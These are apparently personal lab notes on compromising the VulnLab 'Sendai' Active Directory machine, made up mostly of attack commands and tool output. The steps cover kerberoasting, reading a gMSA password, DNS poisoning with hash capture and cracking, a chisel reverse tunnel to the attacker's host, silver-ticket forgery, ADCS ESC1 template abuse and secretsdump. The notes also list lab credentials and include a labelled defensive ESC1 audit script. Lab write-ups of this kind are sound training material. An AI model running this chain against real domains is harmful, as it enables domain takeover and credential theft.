Sendai
This is not a writeup, just my notes about VulnLabs machines.
Last updated
Operating System: Windows
Chain: False
Account        | Password       | Source           | Type
WEBSVC         | Diamond1       | DNS Poisoning    | Domain Account
sqlsvc         | SurenessBlob85 | Found in File    | Service Principal Name
clifford.davey | RFmoB2WplgE_3p | PrivescCheck.ps1 | Domain Account
✅ Valid Usernames
websvc
sqlsvc
DC$
Naomi.Gardner
Kerry.Robinson
Dorothy.Jones
Susan.Harper
Anthony.Smith
Stephen.Simpson
Marie.Gallagher
Kathleen.Kelly
Malcolm.Smith
Jason.Brady
Elliot.Yates
Norman.Baxter
Lisa.Williams
Clifford.Davey
Ross.Sullivan
Declan.Jenkins
Leslie.Johnson
Lawrence.Grant
Megan.Edwards
Thomas.Powell
mgtsvc$
🔑 Passwords list
WEBSVC
Nmap scan
# Nmap 7.94SVN scan initiated Sun Apr 6 01:01:43 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_sendai_tcp_allports -vvv 10.10.113.48
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-06 05:07:57Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
59855/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
59867/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
59897/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
59920/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Not vulnerable to Zone Transfer AXFR
Domain SID: S-1-5-21-3085872742-570972823-736764132
Server allows null session authentication (Medium)
Server allows guest session authentication (Medium)
SID brute-forcing enumeration returned a list of valid domain users. Elliot.Yates and Thomas.Powell returned STATUS_PASSWORD_MUST_CHANGE.
LDAP
Thomas.Powell does not have a vulnerable ADCS template.
Elliot.Yates does not have a vulnerable ADCS template.
Kerberoasting attack
nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' --kerberoast kerberoast.hashes
SMB 10.10.65.121 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP 10.10.65.121 389 DC [+] sendai.vl\Thomas.Powell:Password123!
LDAP 10.10.65.121 389 DC Bypassing disabled account krbtgt
LDAP 10.10.65.121 389 DC [*] Total of records returned 5
LDAP 10.10.65.121 389 DC sAMAccountName: mgtsvc$ memberOf: CN=Remote Management Users,CN=Builtin,DC=sendai,DC=vl pwdLastSet: 2023-07-11 09:06:05.143133 lastLogon:<never>
LDAP 10.10.65.121 389 DC $krb5tgs$18$mgtsvc$$SENDAI.VL$*sendai.vl/mgtsvc$*$6ed01fd1ecee490f551d5ccf$<SNIP>
LDAP 10.10.65.121 389 DC sAMAccountName: sqlsvc memberOf: pwdLastSet: 2023-07-11 05:51:18.413329 lastLogon:2025-04-07 14:51:34.464169
LDAP 10.10.65.121 389 DC $krb5tgs$23$*sqlsvc$SENDAI.VL$sendai.vl/sqlsvc*$95b23428cf862d0e6700ed746da29d63$<SNIP>
Bloodhound enumeration
nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' --dns-server 10.10.65.121 --bloodhound -c all
SMB 10.10.65.121 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP 10.10.65.121 389 DC [+] sendai.vl\Thomas.Powell:Password123!
LDAP 10.10.65.121 389 DC Resolved collection methods: psremote, session, trusts, localadmin, group, acl, dcom, objectprops, container, rdp
LDAP 10.10.65.121 389 DC Done in 00M 32S
LDAP 10.10.65.121 389 DC Compressing output into /home/Intrusionz3r0/.nxc/logs/DC_10.10.65.121_2025-04-07_152023_bloodhound.zip
Finding service.sendai.vl
❯ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.sendai.vl' -u https://sendai.vl/ -fs 703
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://sendai.vl/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.sendai.vl
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 703
________________________________________________
service [Status: 200, Size: 4189, Words: 1104, Lines: 91, Duration: 187ms]
❯ nxc smb 10.10.65.121 -u users.txt -p '' | grep 'STATUS_PASSWORD_MUST_CHANGE'
SMB 10.10.65.121 445 DC [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.65.121 445 DC [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
❯ impacket-changepasswd sendai.vl/Elliot.Yates@10.10.65.121 -newpass 'Password123!' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current password not given: will use KRB5CCNAME
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
❯ impacket-changepasswd sendai.vl/Thomas.Powell@10.10.65.121 -newpass 'Password123!' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current password not given: will use KRB5CCNAME
[*] Changing the password of sendai.vl\Thomas.Powell
[*] Connecting to DCE/RPC as sendai.vl\Thomas.Powell
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Both Thomas.Powell and Elliot.Yates have the same path to compromise MGTSVC$SENDAI.VL and are able to read its msDS-ManagedPassword attribute.
Adding Thomas.Powell into the admsvc group.
❯ bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell'
[+] Thomas.Powell added to admsvc
Reading the mgtsvc$ account's msDS-ManagedPassword attribute.
❯ bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 get object --attr 'msDS-ManagedPassword' 'mgtsvc$'
distinguishedName: CN=mgtsvc,CN=Managed Service Accounts,DC=sendai,DC=vl
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:c15a7132cd45d7e342dc14f29b50b54c
msDS-ManagedPassword.B64ENCODED: b5iv5Uc3ZyRhBaIWWQGpmxDTzIf4Eo8Pvuj4FwAdguz7ovDcAGblAj/51PuQHnq3CSTZ/ZdJROkw/sEQy+fvSphVWXfR/MG6IsqBp03chmOsugliIYtL4UtEdU0JHFETf8h2iWMs1off8282WKGDB5+HAuYPh1Oza+1QGy7uiOP16m3SNjC5XzbhXUoCv3/H3j2KH2jSwUG7naHNUkcoL0Cz5UqnVfZuXPGXZuzXHqHagwZAvsLmZ0KY+5AnbVeEoGHhpjhbGo5dlBM/udxlpGKD+GQEYoBiD1DE1GKhoZ9Gyi6lDQPfQ0RDUuemhTuz15LqXiTMC6S8oOJfE9Q5xA==
WinRM allowed
❯ nxc winrm 10.10.65.121 -u mgtsvc$ -H 'c15a7132cd45d7e342dc14f29b50b54c'
WINRM 10.10.65.121 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.10.65.121 5985 DC [+] sendai.vl\mgtsvc$:c15a7132cd45d7e342dc14f29b50b54c (Pwn3d!)
The site performs DNS resolution, which allows creating a fake computer account and an associated malicious DNS record to capture the NTLMv2 hash of the account the site authenticates with.
❯ nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' -M maq
SMB 10.10.65.121 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP 10.10.65.121 389 DC [+] sendai.vl\Thomas.Powell:Password123!
MAQ 10.10.65.121 389 DC [*] Getting the MachineAccountQuota
MAQ 10.10.65.121 389 DC MachineAccountQuota: 10
❯ impacket-addcomputer sendai.vl/Thomas.Powell:'Password123!' -computer-name z3r0 -computer-pass Password123! -dc-ip 10.10.65.121
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account z3r0$ with password Password123!
❯ python3 dnstool.py -u 'sendai.vl\z3r0$' -p 'Password123!' -r evil.sendai.vl -d 10.8.5.48 -a add dc.sendai.vl -dns-ip 10.10.65.121
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Wait 8-10 minutes for the server to propagate the new DNS record.
sudo responder -I tun0
[sudo] password for Intrusionz3r0:
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
<SNIP>
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.65.121
[HTTP] NTLMv2 Username : SENDAI\websvc
[HTTP] NTLMv2 Hash : websvc::SENDAI:521b32f46ea315bb<SNIP>
hashcat -m 5600 websvc.ntlmv2 /usr/share/wordlists/rockyou.txt
<SNIP>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
WEBSVC::SENDAI:521b32f46ea315bb:24c1c0cdff3bb516f79639b3da01aee2:<SNIP>:Diamond1
#Server
❯ ./chisel server --reverse --socks5 -v -p 1234
# Compromised server (target)
❯ *Evil-WinRM* PS C:\temp> ./chisel client 10.8.5.48:1234 R:socks
The tester found sqlsvc plaintext credentials in c:\config\.sqlconfig; the account is registered with the MSSQL service principal name MSSQL/dc.sendai.vl.
*Evil-WinRM* PS C:\config> type .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;
❯ impacket-lookupsid sendai.vl/Elliot.Yates:'Password123!'@10.10.125.227
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.10.125.227
[*] StringBinding ncacn_np:10.10.125.227[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3085872742-570972823-736764132
❯ pypykatz crypto nt 'SurenessBlob85'
58655c0b90b2492f84fb46fa78c2d96a
❯ impacket-ticketer -nthash 58655c0b90b2492f84fb46fa78c2d96a -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
❯ export KRB5CCNAME=Administrator.ccache
❯ proxychains impacket-mssqlclient -k DC.sendai.vl 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SENDAI\Administrator dbo@master)> enable_xp_cmdshell
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SENDAI\Administrator dbo@master)>
*Evil-WinRM* PS C:\Temp> Import-Module .\PrivescCheck.ps1
*Evil-WinRM* PS C:\Temp> Invoke-PrivescCheck
<SNIP>
Name : Support
DisplayName :
ImagePath : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User : LocalSystem
StartMode : Automatic
<SNIP>
To make a template vulnerable, the following attributes need to be modified with the specified values:
- Grant Enrollment rights for the vulnerable template.
- Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval.
- Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement.
- Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN.
- Set the mspki-certificate-application-policy to a certificate purpose for authentication:
  - Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
  - Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
  - PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
  - Any Purpose (OID: 2.5.29.37.0)
  - No Extended Key Usage (EKU)
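The conditions above as an audit check, an added example that is not code from the original notes or from Certipy: given a template's attributes as read from AD, it reports which of the listed conditions hold and flags the template only when all of them do at once. The two sample templates and the low_priv_can_enroll key are constructed; the flag bit values follow MS-CRTD.

```python
# Audit check for the template conditions listed above. Added example, not
# from the original notes or from Certipy; the sample templates below are
# constructed and the flag bit values follow MS-CRTD.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag

# EKUs that make a certificate usable for domain authentication (OIDs above)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}


def template_findings(tpl: dict) -> dict:
    """Report which of the listed conditions hold for one template.

    Keys mirror the LDAP attribute names; 'low_priv_can_enroll' is a
    constructed stand-in for the enrollment rights parsed from the
    template's security descriptor (True when e.g. Domain Users may enroll).
    """
    ekus = set(tpl.get("msPKI-Certificate-Application-Policy", []))
    enroll_flag = tpl.get("msPKI-Enrollment-Flag", 0)
    name_flag = tpl.get("msPKI-Certificate-Name-Flag", 0)
    return {
        "low_priv_enroll": bool(tpl.get("low_priv_can_enroll", False)),
        "no_manager_approval": not enroll_flag & CT_FLAG_PEND_ALL_REQUESTS,
        "no_authorized_signature": tpl.get("msPKI-RA-Signature", 0) == 0,
        "enrollee_supplies_subject": bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # no EKU at all ("No Extended Key Usage") also allows authentication
        "auth_eku": not ekus or bool(ekus & AUTH_EKUS),
    }


def is_esc1_vulnerable(tpl: dict) -> bool:
    """True only when every condition from the list holds at the same time."""
    return all(template_findings(tpl).values())


# Constructed samples: the same template before and after the weakening above
HARDENED = {
    "low_priv_can_enroll": True,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,  # manager approval on
    "msPKI-RA-Signature": 1,                              # signature required
    "msPKI-Certificate-Name-Flag": 0x02000000,            # SAN built from AD
    "msPKI-Certificate-Application-Policy": ["1.3.6.1.5.5.7.3.2"],
}
WEAKENED = {**HARDENED, "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
            "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT}
```

Run over every template under CN=Certificate Templates in the Configuration partition, the same check reports which templates would need the manager-approval or signature requirement restored.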
❯ certipy-ad template -u 'clifford.davey' -p 'RFmoB2WplgE_3p' -dc-ip 10.10.125.227 -template SendaiComputer
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
❯ certipy-ad req -u 'clifford.davey' -p 'RFmoB2WplgE_3p' -dc-ip 10.10.125.227 -ca sendai-DC-CA -template SendaiComputer -upn Administrator 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
❯ certipy-ad auth -username Administrator -dc-ip 10.10.125.227 -pfx administrator.pfx -domain sendai.vl 2>/dev/null
[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
❯ impacket-getTGT sendai.vl/administrator@10.10.125.227 -hashes aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator@10.10.125.227.ccache
❯ KRB5CCNAME=administrator@10.10.125.227.ccache impacket-secretsdump -k -no-pass dc.sendai.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets